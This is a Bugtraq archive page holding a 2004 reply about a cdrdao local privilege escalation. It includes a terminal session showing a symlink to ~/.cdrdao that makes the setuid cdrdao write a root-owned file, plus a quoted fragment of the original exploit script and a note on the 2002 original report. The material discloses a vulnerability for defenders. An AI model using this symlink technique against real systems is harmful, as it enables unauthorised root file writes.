Bugtraq mailing list archives
Re: cdrdao local root exploit
From: newbug Tseng <newbug () chroot org>
Date: 1 Oct 2004 19:05:58 -0000
In-Reply-To: <1157225765.20040907131857 () SECURITY NNOV RU> The vuln is still exist in cdrdao 1.1.9-5mdk + Mandrake 10 (beta 2). I think cdrdao should drop root permission before save the config. [newbug@localhost tmp]$ ls -al /blah ls: /blah: No such file or directory [newbug@localhost tmp]$ ln -s /blah .cdrdao [newbug@localhost tmp]$ rpm -qf `which cdrdao` cdrdao-1.1.9-5mdk [newbug@localhost tmp]$ cdrdao blank --save . . . [newbug@localhost tmp]$ ls -al /blah -rw-rw-r-- 1 root cdwriter 32 10月 2 10:41 /blah [newbug@localhost tmp]$ newbug Tseng
Received: (qmail 6527 invoked from network); 7 Sep 2004 21:09:36 -0000 Received: from mail2.securityfocus.com (205.206.231.1) by mail.securityfocus.com with SMTP; 7 Sep 2004 21:09:36 -0000 Received: (qmail 13209 invoked by alias); 7 Sep 2004 21:11:52 -0000 Delivered-To: archive-bugtraq () securityfocus com Received: (qmail 13206 invoked from network); 7 Sep 2004 21:11:52 -0000 Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26) by mail2.securityfocus.com with SMTP; 7 Sep 2004 21:11:52 -0000 Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) by outgoing2.securityfocus.com (Postfix) with QMQP id 4864914374E; Tue, 7 Sep 2004 09:06:54 -0600 (MDT) Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq () securityfocus com> List-Help: <mailto:bugtraq-help () securityfocus com> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com> Delivered-To: mailing list bugtraq () securityfocus com Delivered-To: moderator for bugtraq () securityfocus com Received: (qmail 26314 invoked from network); 7 Sep 2004 03:04:40 -0000 Date: Tue, 7 Sep 2004 13:18:57 +0400 From: 3APA3A <3APA3A () SECURITY NNOV RU> Reply-To: 3APA3A <3APA3A () SECURITY NNOV RU> Organization: http://www.security.nnov.ru X-Priority: 3 (Normal) Message-ID: <1157225765.20040907131857 () SECURITY NNOV RU> To: =?Windows-1251?B?Suly9G1lIEFUSElBUw==?= <jerome.athias () caramail com> Cc: bugtraq () securityfocus com Subject: Re: cdrdao local root exploit In-Reply-To: <20040905191642.18379.qmail () www securityfocus com> References: <20040905191642.18379.qmail () www securityfocus com> MIME-Version: 1.0 Content-Type: text/plain; charset=Windows-1251 Content-Transfer-Encoding: 8bit Dear Jérôme ATHIAS, This bug was originally reported to Bugtraq by Andreas Mueller on January, 15 2002 --Sunday, September 5, 2004, 11:16:42 PM, you wrote to bugtraq () securityfocus com: JA> if [ ! -L $HOME/.cdrdao ];then echo "Could'n link to \$HOME/.cdrdao" -- ~/ZARAZA Íåïðèÿòíîñòè íà÷íóòñÿ â âîñåìü. (Òâåí)
Current thread:
- Re: cdrdao local root exploit newbug Tseng (Oct 01)